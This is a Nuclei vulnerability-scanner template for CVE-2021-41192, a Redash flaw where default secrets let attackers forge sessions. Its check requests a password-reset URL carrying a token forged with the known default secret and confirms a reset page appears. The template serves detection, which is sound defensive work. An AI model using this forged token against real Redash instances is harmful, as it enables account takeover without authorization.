nuclei-templates/http/cves/2021/CVE-2021-41192.yaml

52 lines
2.0 KiB
YAML

id: CVE-2021-41192
info:
name: Redash Setup Configuration - Default Secrets Disclosure
author: bananabr
severity: medium
description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
remediation: |
Remove or update the default secrets in the Redash setup configuration file.
reference:
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
- https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2021-41192
cwe-id: CWE-1188
epss-score: 0.00805
epss-percentile: 0.79767
cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: "redash"
product: "redash"
shodan-query: http.favicon.hash:698624197
tags: hackerone,cve,cve2021,redash,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Enter your new password:"
- "redash"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100dabd29448e1414026bf16af6e02eae58db78bb9f7049923d7e3480acf11d5778022100f6473f7457ee9a1f4e821cc1641e02933498a51201f6def3a06096916f2490ba:922c64590222798bb761d5b6d8e72950